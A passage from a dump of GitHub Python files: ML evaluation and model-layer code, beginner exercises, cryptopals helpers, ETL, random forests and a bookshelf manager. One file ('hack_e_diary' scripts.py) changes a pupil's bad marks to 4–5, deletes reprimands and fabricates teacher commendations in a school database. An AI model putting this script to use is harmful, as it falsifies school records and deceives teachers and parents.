the test set\nood_data = dset.ImageFolder(root=os.path.join(args.stored_data_path,'SUN'),\n transform=transform_all) \nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, pin_memory=True)\nprint('\\n\\nSUN Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n\n# # /////////////// iNaturalist /////////////// # cropped and no sampling of the test set\nood_data = dset.ImageFolder(root=os.path.join(args.stored_data_path,'iNaturalist/'),\n transform=transform_all) \nood_loader = torch.utils.data.DataLoader(ood_data, batch_size=args.batch_size, shuffle=True,\n num_workers=2, pin_memory=True)\nprint('\\n\\niNaturalist Detection')\nfpr,auc = get_and_print_results(ood_loader)\nfprlist.append(fpr)\nauclist.append(auc)\n\nprint('avg:',sum(fprlist)/len(fprlist),sum(auclist)/len(auclist))","repo_name":"zjs975584714/SHE_ood_detection","sub_path":"test_score_ood_detection.py","file_name":"test_score_ood_detection.py","file_ext":"py","file_size_in_byte":17748,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"36940333341","text":"#1- having string 'hello' use indexing and reverse indexing to get the letter 'e'\nmyvar1 = 'hello'\nprint(myvar1[1])\nprint(myvar1[-4])\n\n#2- [1,2,[3,4,'dog']] change the word 'dog' to 'cat'\nmyvar2 = [1,2,[3,4,'dog']]\nmyvar2[2][2] = 'cat'\nprint(myvar2)\n\n#3- grap the word 'hello' from these dictionaries:\n# {'k':'hello'}\nmyvar3 = {'k':'hello'}\nresult = myvar3['k']\nprint(result)\n# {'k1':{'k2':'hello'}}\nmyvar4 = {'k1':{'k2':'hello'}}\nresult = myvar4['k1']['k2']\nprint(result)\n# {'k1':[1,2,{'k2':{'k3':'hello'}}]}\nmyvar5 = {'k1':[1,2,{'k2':{'k3':'hello'}}]}\nresult = myvar5['k1'][2]['k2']['k3']\nprint(result)","repo_name":"farisslewa/python-resources","sub_path":"assignments/solution 1.py","file_name":"solution 1.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"20341766430","text":"import math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.init import kaiming_normal, kaiming_uniform\nfrom functools import partial\n\n\nclass ResidualBlock(nn.Module):\n def __init__(self, in_dim, out_dim=None,\n with_residual=True,\n with_batchnorm=True,\n with_film=False,\n with_coords=False,\n coord_shape=None,\n downsample=False,\n is_3d=False):\n if out_dim is None:\n out_dim = in_dim\n super(ResidualBlock, self).__init__()\n\n if is_3d:\n conv_class = nn.Conv3d\n bn_class = nn.BatchNorm3d\n else:\n conv_class = nn.Conv2d\n bn_class = nn.BatchNorm2d\n\n self.with_coords = with_coords\n coord_dim = 0\n if with_coords:\n if coord_shape is None:\n raise Exception(\"Need to specify spatial dim of coord layers\")\n else:\n if is_3d:\n self.coords = coord_map_3d(coord_shape)\n coord_dim = 3\n else:\n self.coords = coord_map(coord_shape)\n coord_dim = 2\n\n self.conv1 = conv_class(in_dim+coord_dim,\n out_dim,\n kernel_size=3,\n padding=1)\n self.conv2 = conv_class(out_dim,\n out_dim,\n kernel_size=3,\n padding=1,\n stride=2 if downsample else 1)\n self.with_batchnorm = with_batchnorm\n self.with_film = with_film\n self.is_3d = is_3d\n\n if with_batchnorm:\n self.bn1 = bn_class(out_dim, affine=False)\n self.bn2 = bn_class(out_dim, affine=False)\n self.film = None\n if with_film:\n self.film = Film()\n self.with_residual = with_residual\n if not downsample and (in_dim == out_dim or not with_residual):\n self.proj = None\n else:\n if downsample:\n self.proj = nn.Sequential(\n conv_class(in_dim+coord_dim,\n out_dim, kernel_size=1),\n nn.AvgPool3d(2) if is_3d else nn.AvgPool2d(2)\n )\n else:\n self.proj = conv_class(in_dim+coord_dim,\n out_dim, kernel_size=1)\n\n def forward(self, x, embedding=None):\n orig_x = x\n if self.with_coords:\n if self.is_3d:\n coords = self.coords.repeat(x.size(0), 1, 1, 1, 1)\n else:\n coords = self.coords.repeat(x.size(0), 1, 1, 1)\n x = torch.cat((x, coords), dim=1)\n if self.with_batchnorm:\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.bn2(self.conv2(out))\n if self.film is not None:\n out = self.film(out, embedding)\n else:\n out = self.conv2(F.relu(self.conv1(x)))\n res = orig_x if self.proj is None else self.proj(x)\n if self.with_residual:\n out = F.relu(res + out)\n else:\n out = F.relu(out)\n return out\n\ndef coord_map(shape, start=-1, end=1):\n \"\"\"\n Gives, a 2d shape tuple, returns two mxn coordinate maps,\n Ranging min-max in the x and y directions, respectively.\n \"\"\"\n m, n = shape\n x_coord_row = torch.linspace(start, end, steps=n).type(torch.cuda.FloatTensor)\n y_coord_row = torch.linspace(start, end, steps=m).type(torch.cuda.FloatTensor)\n x_coords = x_coord_row.unsqueeze(0).expand(torch.Size((m, n))).unsqueeze(0)\n y_coords = y_coord_row.unsqueeze(1).expand(torch.Size((m, n))).unsqueeze(0)\n return torch.cat([x_coords, y_coords], 0)\n\ndef coord_map_3d(shape, start=-1, end=1):\n \"\"\"\n Gives, a 3d shape tuple, returns two mxn coordinate maps,\n Ranging min-max in the x and y directions, respectively.\n \"\"\"\n m, n, o = shape\n x_coord_row = torch.linspace(start, end, steps=n).type(torch.cuda.FloatTensor)\n y_coord_row = torch.linspace(start, end, steps=o).type(torch.cuda.FloatTensor)\n z_coord_row = torch.linspace(start, end, steps=m).type(torch.cuda.FloatTensor)\n\n x_coords = x_coord_row.unsqueeze(0).expand(torch.Size((m, n, o))).unsqueeze(0)\n y_coords = y_coord_row.unsqueeze(1).expand(torch.Size((m, n, o))).unsqueeze(0)\n #z_coords = z_coord_row.unsqueeze(2).expand(torch.Size((m, n, o))).unsqueeze(0)\n z_coords = z_coord_row.unsqueeze(0).view(-1, m, 1, 1).repeat(1,1,n,o)\n\n return torch.cat([x_coords, y_coords, z_coords], 0)\n\n\nclass Film(nn.Module):\n \"\"\"\n A Feature-wise Linear Modulation Layer from\n 'FiLM: Visual Reasoning with a General Conditioning Layer'\n \"\"\"\n def forward(self, x, embedding):\n gammas = embedding[:, 0:(embedding.size(1)//2)]\n betas = embedding[:, (embedding.size(1)//2)::]\n if len(x.shape) == 4:\n gammas = gammas.unsqueeze(2).unsqueeze(3).expand_as(x)\n betas = betas.unsqueeze(2).unsqueeze(3).expand_as(x)\n elif len(x.shape) == 5:\n gammas = gammas.unsqueeze(2).unsqueeze(3).unsqueeze(4).expand_as(x)\n betas = betas.unsqueeze(2).unsqueeze(3).unsqueeze(4).expand_as(x)\n else:\n raise Exception(\"\")\n\n return (gammas * x) + betas\n\nclass ConcatBlock(nn.Module):\n def __init__(self, dim, with_residual=True, with_batchnorm=True):\n super(ConcatBlock, self).__init__()\n self.proj = nn.Conv2d(2 * dim, dim, kernel_size=1, padding=0)\n self.res_block = ResidualBlock(dim, with_residual=with_residual,\n with_batchnorm=with_batchnorm)\n\n def forward(self, x, y):\n out = torch.cat([x, y], 1) # Concatentate along depth\n out = F.relu(self.proj(out))\n out = self.res_block(out)\n return out\n\n\nclass GlobalAveragePool(nn.Module):\n def forward(self, x):\n N, C = x.size(0), x.size(1)\n return x.view(N, C, -1).mean(2).squeeze(2)\n\n\nclass Flatten(nn.Module):\n def forward(self, x):\n return x.view(x.size(0), -1)\n\n\ndef build_stem(feature_dim, module_dim, num_layers=2, with_batchnorm=True,\n kernel_size=3, stride=1, padding=None):\n layers = []\n prev_dim = feature_dim\n if padding is None: # Calculate default padding when None provided\n if kernel_size % 2 == 0:\n raise(NotImplementedError)\n padding = kernel_size // 2\n for i in range(num_layers):\n layers.append(nn.Conv2d(prev_dim, module_dim, kernel_size=kernel_size, stride=stride,\n padding=padding))\n if with_batchnorm:\n layers.append(nn.BatchNorm2d(module_dim))\n layers.append(nn.ReLU(inplace=True))\n prev_dim = module_dim\n return nn.Sequential(*layers)\n\n\ndef build_classifier(module_C, module_H, module_W, num_answers,\n fc_dims=[], proj_dim=None, downsample='maxpool2',\n with_batchnorm=True, dropout=0):\n layers = []\n prev_dim = module_C * module_H * module_W\n if proj_dim is not None and proj_dim > 0:\n layers.append(nn.Conv2d(module_C, proj_dim, kernel_size=1))\n if with_batchnorm:\n layers.append(nn.BatchNorm2d(proj_dim))\n layers.append(nn.ReLU(inplace=True))\n prev_dim = proj_dim * module_H * module_W\n if 'maxpool' in downsample or 'avgpool' in downsample:\n pool = nn.MaxPool2d if 'maxpool' in downsample else nn.AvgPool2d\n if 'full' in downsample:\n if module_H != module_W:\n assert(NotImplementedError)\n pool_size = module_H\n else:\n pool_size = int(downsample[-1])\n # Note: Potentially sub-optimal padding for non-perfectly aligned pooling\n padding = 0 if ((module_H % pool_size == 0) and (module_W % pool_size == 0)) else 1\n layers.append(pool(kernel_size=pool_size, stride=pool_size, padding=padding))\n prev_dim = proj_dim * math.ceil(module_H / pool_size) * math.ceil(module_W / pool_size)\n if downsample == 'aggressive':\n layers.append(nn.MaxPool2d(kernel_size=2, stride=2))\n layers.append(nn.AvgPool2d(kernel_size=module_H // 2, stride=module_W // 2))\n prev_dim = proj_dim\n fc_dims = [] # No FC layers here\n layers.append(Flatten())\n for next_dim in fc_dims:\n layers.append(nn.Linear(prev_dim, next_dim))\n if with_batchnorm:\n layers.append(nn.BatchNorm1d(next_dim))\n layers.append(nn.ReLU(inplace=True))\n if dropout > 0:\n layers.append(nn.Dropout(p=dropout))\n prev_dim = next_dim\n layers.append(nn.Linear(prev_dim, num_answers))\n return nn.Sequential(*layers)\n\n\ndef init_modules(modules, init='uniform'):\n if init.lower() == 'normal':\n init_params = kaiming_normal\n elif init.lower() == 'uniform':\n init_params = kaiming_uniform\n else:\n return\n for m in modules:\n if isinstance(m, (nn.Conv2d, nn.Linear)):\n init_params(m.weight)\n","repo_name":"christopher-beckham/clevr-mrt","sub_path":"src/architectures/clevr/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":8340,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"72557970554","text":"import random\n\nfrom datacenter.models import (Chastisement,\n Commendation,\n Lesson,\n Mark,\n Schoolkid,\n Subject\n )\n\ndef get_schoolkid(schoolkid_name):\n try:\n schoolkid = Schoolkid.objects.get(full_name__contains=schoolkid_name)\n return schoolkid\n except MultipleObjectsReturned:\n print('Найдено учеников больше, чем один. Уточните имя!')\n except ObjectDoesNotExist:\n print('Ученик не найден, проверьте правильность имени')\n\n\ndef get_subject(commendation_subject, schoolkid):\n try:\n subject = Subject.objects.get(title=commendation_subject,\n year_of_study=schoolkid.year_of_study\n )\n return subject\n except ObjectDoesNotExist:\n print('Предмет не найден, проверьте правильность названия')\n\n\ndef fix_marks(schoolkid_name):\n schoolkid = get_schoolkid(schoolkid_name)\n bad_marks = Mark.objects.filter(schoolkid=schoolkid,\n points__lt=4\n )\n for mark in bad_marks:\n mark.points = random.randint(4, 5)\n mark.save()\n print(f'Оценки для {schoolkid_name} исправлены')\n\n\ndef remove_chastisements(schoolkid_name):\n schoolkid = get_schoolkid(schoolkid_name)\n chatisements = Chastisement.objects.filter(schoolkid=schoolkid)\n chatisements.delete()\n print(f'Замечания для {schoolkid_name} убраны')\n\n\ndef get_commendation(schoolkid_name, commendation_subject):\n schoolkid = get_schoolkid(schoolkid_name)\n commendation = [\n \"Молодец\",\n \"Отлично\",\n \"Хорошо!\",\n \"Гораздо лучше, чем я ожидал!\",\n \"Ты меня приятно удивил!\",\n \"Великолепно!\",\n \"Прекрасно!\",\n \"Ты меня очень обрадовал!\",\n \"Именно этого я давно ждал от тебя!\",\n \"Сказано здорово – просто и ясно!\",\n \"Ты, как всегда, точен!\",\n \"Очень хороший ответ!\",\n \"Талантливо!\",\n \"Ты сегодня прыгнул выше головы!\",\n \"Я поражен!\",\n \"Уже существенно лучше!\",\n \"Потрясающе!\",\n \"Замечательно!\",\n \"Прекрасное начало!\",\n \"Так держать!\",\n \"Ты на верном пути!\",\n \"Здорово!\",\n \"Это как раз то, что нужно!\",\n \"Я тобой горжусь!\",\n \"С каждым разом у тебя получается всё лучше!\",\n \"Мы с тобой не зря поработали!\",\n \"Я вижу, как ты стараешься!\",\n \"Ты растешь над собой!\",\n \"Ты многое сделал, я это вижу!\",\n \"Теперь у тебя точно все получится!\"\n ]\n if not schoolkid:\n return\n subject = get_subject(commendation_subject=commendation_subject,\n schoolkid=schoolkid\n )\n if not subject:\n return\n lessons = Lesson.objects.filter(year_of_study=schoolkid.year_of_study,\n group_letter=schoolkid.group_letter,\n subject=subject\n )\n text_commendation = random.choice(commendation)\n Commendation.objects.create(text=text_commendation,\n created=lessons.first().date,\n schoolkid=schoolkid,\n teacher=lessons.first().teacher,\n subject=subject\n )\n print(f'Добавлена похвала для {schoolkid_name} по предмету '\n f'{subject}: {text_commendation}')\n","repo_name":"axrasp/hack_e_diary","sub_path":"scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42733538937","text":"def bit_distance(b1: bytes, b2: bytes) -> int:\n assert len(b1) == len(b2)\n distance = 0\n for i in range(0, len(b1)):\n for j in range(0, len(b1)):\n bit1 = (b1[i] >> j) % 2\n bit2 = (b2[i] >> j) % 2\n if bit1 != bit2:\n distance += 1\n return distance\n\n\ndef normalized_bit_distance(bs: bytes, x: int) -> float:\n s1 = bs[:1 * x]\n s2 = bs[1 * x:2 * x]\n return bit_distance(s1, s2) / x\n\n\ndef average_bit_distance(bs: bytes, x: int) -> float:\n s1 = bs[:1 * x]\n s2 = bs[1 * x:2 * x]\n s3 = bs[2 * x:3 * x]\n s4 = bs[3 * x:4 * x]\n\n score = 0\n for i in [s1, s2, s3, s4]:\n for j in [s1, s2, s3, s4]:\n if i != j:\n score += bit_distance(i, j)\n return score / x\n","repo_name":"kumikoda/cryptopals-python","sub_path":"crypto/hamming.py","file_name":"hamming.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"20335447678","text":"import os\nimport sys\nfrom abc import ABCMeta\nsys.path.append(os.path.join('..', '..'))\n\nimport pandas as pd\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nimport config\nfrom modules.base.connector import DatabaseConnector\n\nclass Transformer():\n def __init__(self, name, statement):\n self.__name = name\n self.__statement = statement\n\n def get_statement(self):\n return self.__statement\n\n'''\nExpansions\n'''\n\nclass WeatherDatabaseManager(DatabaseConnector):\n def __init__(self):\n self.create_transforms()\n self.create_date_table()\n\n ## Database Deployment\n def create_transforms(self):\n self.__transformers = []\n for file in filter(lambda x: x.startswith('Transform') ,os.listdir(os.path.join(config.MODULES_PATH, 'etl', 'sql'))):\n with open(os.path.join(os.path.join(config.MODULES_PATH, 'etl', 'sql', file)), 'r') as stmt:\n tran = Transformer(file.removesuffix('.sql'), stmt.read())\n self.__transformers.append(tran)\n \n @self.execute_returned_sql_transaction\n def create_date_table(self):\n with open(os.path.join(os.path.join(config.MODULES_PATH, 'etl', 'sql', 'CreateDate.sql')), 'r') as stmt:\n return stmt.read()\n\n ## ETL\n def perform_etl(self):\n self.extract_from_csv()\n self.transform_and_load()\n\n ## Extraction of Data into source from csvs\n def extract_from_csv(self):\n # Dynamically Get the Data from the CSV\n for file in ['province_detail.csv', 'station_detail.csv', 'climate_data.csv']:\n df = pd.read_csv(os.path.join(config.DATA_PATH, file))\n name = file.strip.split('_')[0]\n df.columns = [col.lower() for col in df.columns]\n rows = df.to_sql(f'{name}', self.get_engine(), schema='public', if_exists='append', index=False)\n\n def transform_and_load(self):\n for transformer in self.__transformers:\n WeatherDatabaseManager.execute_transform_statement(transformer)\n \n @staticmethod\n @self.execute_returned_sql_transaction\n def execute_transform_statement(transformer):\n return transformer.get_statement()\n","repo_name":"Paolo1151/WeatherWebApp","sub_path":"modules/etl/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"14445361752","text":"from math import inf\nimport sys\nsys.path.append(\"../DecisionTree\")\nimport DecisionTree\n\ndef RandomForests(data, attrDict, labelCol, gainMethod, T, featureSetSize, samplesize):\n import random, math\n forest = []\n\n for i in range(T):\n samples = random.choices(data, k=math.ceil(samplesize*len(data)))\n\n root = DecisionTree.Tree(None)\n root.depth = 0\n DecisionTree.ID3_RandTree(samples, attrDict, labelCol, root, inf, gainMethod, None, featureSetSize)\n forest.append(root)\n\n return forest\n\ndef predict(data, predictCol, forest):\n import copy\n predictData = copy.deepcopy(data)\n\n for example in predictData:\n example[predictCol] = predict_example(example, predictCol, forest)\n\n return predictData\n\ndef predict_example(example, predictCol, forest):\n labelVotes = {}\n for root in forest:\n thisPredict = DecisionTree.predict_example(example, predictCol, root)\n if thisPredict not in labelVotes:\n labelVotes[thisPredict] = 1\n else:\n labelVotes[thisPredict] += 1\n return max(labelVotes, key=labelVotes.get)\n","repo_name":"u0857568/CS6350","sub_path":"EnsembleLearning/RandomForestMain.py","file_name":"RandomForestMain.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"18228125829","text":"\"\"\"\nCheck the \"k\" value for each \"<tag>\" and see if there are any potential problems.\n\nThe function 'key_type' provides a count of each of four tag categories in a dictionary:\n \"lower\", for tags that contain only lowercase letters and are valid,\n \"lower_colon\", for otherwise valid tags with a colon in their names,\n \"problemchars\", for tags with problematic characters, and\n \"other\", for other tags that do not fall into the other three categories.\n\"\"\"\n\n\nimport xml.etree.cElementTree as ET\nimport pprint\nimport re\n\n\n\"\"\"\n3 regular expressions provided by Udacity Data Analyst Nanodegree \nchecking for certain patterns in the tags. \n\"\"\"\nlower = re.compile(r'^([a-z]|_)*$')\nlower_colon = re.compile(r'^([a-z]|_)*:([a-z]|_)*$')\nproblemchars = re.compile(r'[=\\+/&<>;\\'\"\\?%#$@\\,\\. \\t\\r\\n]')\n\n\ndef key_type(element, keys):\n if element.tag == \"tag\":\n key = element.attrib['k']\n if lower.search(key):\n keys['lower'] = keys['lower'] + 1\n elif lower_colon.search(key):\n keys['lower_colon'] = keys['lower_colon'] + 1\n elif problemchars.search(key):\n keys['problemchars'] = keys['problemchars'] + 1\n else:\n keys['other'] = keys['other'] + 1\n \n return keys\n\n\ndef process_map(filename):\n keys = {\"lower\": 0, \"lower_colon\": 0, \"problemchars\": 0, \"other\": 0}\n for _, element in ET.iterparse(filename):\n keys = key_type(element, keys)\n\n return keys\n\n\nkeys = process_map('new-york_new-york.osm')\npprint.pprint(keys)","repo_name":"qinliu1023/wrangle_data_2","sub_path":"check_keys.py","file_name":"check_keys.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26570733125","text":"import os\nfrom tqdm import tqdm\nfrom utils import *\n\ncam_dir = './CAM/'\nsavedir = './Full_CAM/'\nos.makedirs(savedir,exist_ok=True)\ncropdata_dir='./preprocessing_data/test/'\ndatas=glob.glob('./data/test/shoulder_image/*')\nfor data in tqdm(datas):\n img=cv2.imread(data,0)\n\n cams_r = glob.glob(cam_dir+data.split('/')[-1].replace('.png','')+'_r_*gradcam*')\n cams_l = glob.glob(cam_dir+data.split('/')[-1].replace('.png','')+'_l_*gradcam*')\n\n maskimg = cv2.imread(data.replace('/shoulder_image/', '/shoulder_mask/'), 0)\n\n maskimg = cv2.resize(maskimg,img.shape[::-1])\n maskimg[maskimg>0]=1\n maskimg[int(maskimg.shape[0] / 2):, :] = 0\n\n w, h=maskimg.shape[::-1]\n padding_val = int(w/2) if w>h else int(h/2)\n maskimg = cv2.copyMakeBorder(maskimg, padding_val, padding_val, padding_val, padding_val, cv2.BORDER_CONSTANT, value=0)\n img = cv2.copyMakeBorder(img, padding_val, padding_val, padding_val, padding_val, cv2.BORDER_CONSTANT, value=0)\n\n full_cam = maskimg.copy()\n full_cam[full_cam!=0]=0\n leftmask = maskimg.copy()\n leftmask[:, int(maskimg.shape[0]/2):] = 0\n rightmask = maskimg.copy()\n rightmask[:, :int(maskimg.shape[0]/2)] = 0\n\n\n if len(cams_r)>0:\n\n cropshape, croplist=find_center(rightmask)\n shape_size = np.max(cropshape.shape)\n shape_size = 512 if shape_size < 512 else int(shape_size * 2 / 3)\n center_point = [int((croplist[0]+croplist[1])/2),int((croplist[2]+croplist[3])/2)]\n full_cam[center_point[0] - shape_size:center_point[0] + shape_size,\n center_point[1] - shape_size:center_point[1] + shape_size]= cv2.resize(cv2.imread(cams_r[0],0),(shape_size*2,shape_size*2))\n\n if len(cams_l) > 0:\n\n cropshape, croplist=find_center(leftmask)\n shape_size = np.max(cropshape.shape)\n shape_size = 512 if shape_size < 512 else int(shape_size * 2 / 3)\n center_point = [int((croplist[0] + croplist[1]) / 2), int((croplist[2] + croplist[3]) / 2)]\n full_cam[center_point[0] - shape_size:center_point[0] + shape_size,\n center_point[1] - shape_size:center_point[1] + shape_size]=cv2.resize(cv2.flip(cv2.imread(cams_l[0],0),1),(shape_size*2,shape_size*2))\n\n img=cv2.merge([img,img,img])\n full_cam=cv2.applyColorMap(full_cam,colormap=cv2.COLORMAP_JET)\n img=img[padding_val:-padding_val,padding_val:-padding_val]\n full_cam = full_cam[padding_val:-padding_val, padding_val:-padding_val]\n cam_img=cv2.addWeighted(img,0.6,full_cam,0.4,0)\n cv2.imwrite(savedir+data.split('/')[-1],cam_img)\n\n","repo_name":"kskim-phd/FPAR","sub_path":"Overlay_Heatmap_and_image.py","file_name":"Overlay_Heatmap_and_image.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"36556376323","text":"'''A program to manage my bookshelves, books, and reviews.'''\n\nimport pickle\nimport functools\nimport time\nimport os\n\n\nclass Bookshelf():\n '''An entity that represents a place for all my books.'''\n\n bookshelf_count = 0\n bookshelves = []\n\n def __init__(self, name=\"bookshelf\"):\n self.name = name\n self.books = []\n Bookshelf.bookshelves.append(self)\n Bookshelf.bookshelf_count += 1\n self.books_count = 0\n self.reviews_count = 0\n self.filtered_books = self.books.copy()\n self.filter = 'All Books'\n self.sort_val = 'None'\n\n def __str__(self):\n return self.name\n\n def __repr__(self):\n return self.name\n\n @classmethod\n def load_bookshelf(cls, file):\n return pickle.load(open(file, \"rb\"))\n\n def save_bookshelf(self):\n pickle.dump(self, open(f\"{self.name}.bkshlf\", \"wb\"))\n\n def get_books(self):\n return self.filtered_books\n\n def get_bookshelves():\n return Bookshelf.bookshelves\n\n def reset_bookshelf(self):\n Bookshelf.bookshelf_count = len(Bookshelf.bookshelves)\n self.filtered_books = self.books.copy()\n self.books_count = 0\n self.reviews_count = 0\n self.filter = 'All Books'\n self.sort_val = 'None'\n for book in self.filtered_books:\n self.books_count += 1\n book.reviews_count = len(book.reviews)\n self.reviews_count += len(book.reviews)\n\n def add_book(self, book=None):\n \"\"\"Add a book to the bookshelf.\n If a book is not provided, user will be prompted to add the book manually.\"\"\"\n if book is None:\n book = Book(bookshelves=[self])\n self.books.append(book)\n self.filtered_books.append(book)\n self.books_count += 1\n print(f\"\\n{book.get_book_info()}\\n\\n{book} added to {self.name}\")\n\n def filter_books(self):\n self.filtered_books = self.filtered_books[0:2]\n self.filter = '1st 2 books'\n \n def filter_books_status(self, status = None):\n if status is not None:\n temp_books = []\n for book in self.filtered_books:\n if book.book_status == status:\n temp_books.append(book)\n self.filtered_books = temp_books\n self.filter = status\n \n def sort_books(self, sort_val = 'Title', reverse_arg = False):\n for book in self.filtered_books:\n book.sort_val = book.sort_book(sort_val)\n self.filtered_books = sorted(self.filtered_books, reverse = reverse_arg)\n self.sort_val = sort_val\n \n def print_bookshelf_summary(self):\n \"\"\"Print the summary information for the the bookshelf.\"\"\"\n print(f'\\nBookshelf: {self}\\nFilter: {self.filter}\\nSort: {self.sort_val}')\n print(f'Books: {self.books_count}\\nReviews: {self.reviews_count}')\n\n def print_books_titles(self, sort_val=None):\n \"\"\"Print the book titles for all books in the bookshelf,\n sorted by the sort method (if provided).\"\"\"\n if sort_val:\n raise Exception(\"Need to make sort() work with the Books class\")\n else:\n books_sorted = self.filtered_books\n\n if books_sorted:\n for book in books_sorted:\n print(book.get_title())\n else:\n print(\"No books to print: Bookshelf is empty! Find some books!\")\n\n def print_books_info(self, sort_val=None):\n \"\"\"Print the full book information for all books in the bookshelf (not including reviews),\n sorted by the sort method (if provided).\"\"\"\n if sort_val:\n raise Exception(\"Need to make sort() work with the Books class\")\n else:\n books_sorted = self.filtered_books\n\n if books_sorted:\n for book in books_sorted:\n print(book.get_book_info(), '\\n')\n else:\n print(\n \"No books to print info: Bookshelf is empty! Find some books!\"\n )\n\n def print_reviews(self, sort_val=None):\n \"\"\"Print the full review information for all books in the bookshelf,\n sorted by the sort method (if provided).\"\"\"\n\n if sort_val:\n raise Exception(\"Need to make sort() work with the Books class\")\n else:\n books_sorted = self.filtered_books\n\n if books_sorted:\n for book in books_sorted:\n book.print_reviews()\n print()\n else:\n print(\n \"No books to print reviews for: Bookshelf is empty! Find some books!\"\n )\n\n def print_ascii_books(self,\n sort_val=None,\n letters_per_ascii_book=20,\n ascii_books_per_row=14):\n '''method to print the bookshelf in ascii art format, sorted by the value provided.\n The height of each shelf/book can be controlled by the letters_per_ascii_book, and\n the width can be controlled by the ascii_books_per_row.\n\n Format inspired by https://codegolf.stackexchange.com/questions/111833/ascii-bookshelves'''\n if sort_val:\n raise Exception(\"Need to make sort() work with the Books class\")\n else:\n books_sorted = self.filtered_books\n\n print(f'\\n Bookshelf: {self}\\t\\tFilter: {self.filter}\\tSort: {self.sort_val}')\n books = [book.get_title() for book in self.filtered_books]\n num_books = len(books)\n books_count = len(books)\n k = '|' + '-----' * ascii_books_per_row + '|'\n if books_count:\n while books_count:\n books_in_row = books_count % ascii_books_per_row or ascii_books_per_row\n print(k + '\\n' +\n ('|' + ' ' * (ascii_books_per_row - books_in_row) +\n '/___/' * books_in_row + '|'))\n num_letters = letters_per_ascii_book\n while num_letters:\n book_string = ''\n col_string = ''\n for i in range(0, books_in_row):\n temp_book = books[num_books - books_count + i]\n if letters_per_ascii_book - num_letters < len(\n temp_book):\n book_string_letter = temp_book[\n letters_per_ascii_book - num_letters]\n else:\n book_string_letter = ' '\n book_string += f'| {book_string_letter} |'\n col_string += f' {num_books - books_count + i + 1:-2} '\n print('|' + ' ' * (ascii_books_per_row - books_in_row) +\n book_string + '|')\n num_letters -= 1\n print('|' + ' ' * (ascii_books_per_row - books_in_row) +\n \"^---^\" * books_in_row + '|' + '\\n' + k)\n print('|' + ' ' * (ascii_books_per_row - books_in_row) +\n col_string + '|')\n books_count -= books_in_row\n else:\n print(k + '\\n' + ('|' + ' ' * ascii_books_per_row + '|' + '\\n') *\n (letters_per_ascii_book + 2) + k)\n print(\"No books to print: Bookshelf is empty! Find some books!\")\n\n\n@functools.total_ordering\nclass Book():\n '''An entity that represents a book and associated data.\n\n Class Attributes:\n book_count\n book_statuses = 1: 'Want to Read',\n 2: 'Reviewed',\n 3: 'Read_No_Review',\n 4: 'Don't want to read'\n\n Instance Attributes:\n title\n author\n isbn\n url (to Amazon/goodreads/etc.)\n recommended_by (who recommended the book)\n other (text field for whatever additional notes the user would like to record about the book,\n not including review information)\n book_status - (Want to Read, Reviewed, Read_No_Review, Don't want to read)\n bookshelves (list of bookshelves the book has been added to)\n reviews\n\n Methods:\n get_title\n get_book_info\n print_reviews\n add_review\n '''\n book_count = 0\n\n book_statuses = {\n 1: \"Want to Read\",\n 2: \"Reviewed\",\n 3: \"Read, but not reviewed\",\n 4: \"Don't want to read\"\n }\n\n add_book_statuses = {\n 1: \"Want to Read\",\n 2: \"Want to Review\",\n 3: \"Read, but don\\'t want to review now\",\n 4: \"Don't want to read\"\n }\n\n def __init__(self,\n title=None,\n author=None,\n isbn=None,\n url=None,\n recommended_by=None,\n other=None,\n book_status=1,\n bookshelves=[],\n review=None):\n if title is None:\n self.title = input(\"Enter a title: \")\n self.author = input(\"Enter the author: \")\n self.isbn = input(\"Enter the ISBN (if you have one): \")\n self.url = input(\n \"Enter a url for Amazon/Goodreads/etc.(if you have one): \")\n self.recommended_by = input(\n \"Enter details for who recommended the book (if you have one): \"\n )\n print(\"Enter any additional notes the you would like to record about the book,\")\n self.other = input(\"not including review information: \")\n self.book_status = self.input_book_status()\n self.bookshelves = bookshelves\n self.sort_val = self.title\n else:\n self.title = title\n self.author = author\n self.isbn = isbn\n self.url = url\n self.recommended_by = recommended_by\n self.other = other\n self.book_status = Book.book_statuses[book_status]\n self.bookshelves = bookshelves\n self.sort_val = self.title\n if review is None:\n self.reviews = []\n if self.book_status == 'Reviewed':\n print('\\nWould you like to review this book now? (1 = Yes, Anything else = No)')\n try:\n if int(input('Entry: ')) == 1:\n self.add_review()\n else:\n raise\n except:\n self.book_status = Book.book_statuses[3]\n print(f\"Changing book status to: {self.book_status}\")\n else:\n self.add_review(review)\n Book.book_count += 1\n \n def __lt__(self, other):\n try:\n return self.sort_val < other.sort_val\n except:\n return False\n\n def __eq__(self, other):\n try:\n return self.sort_val == other.sort_val\n except:\n return False\n\n def __repr__(self):\n return self.title\n\n def __str__(self):\n return self.title\n\n def get_title(self):\n return self.title\n\n def get_book_info(self):\n\n return f\"{self}\\n\\\n Author: {self.author}\\n\\\n ISBN: {self.isbn}\\n\\\n url: {self.url}\\n\\\n Recommended 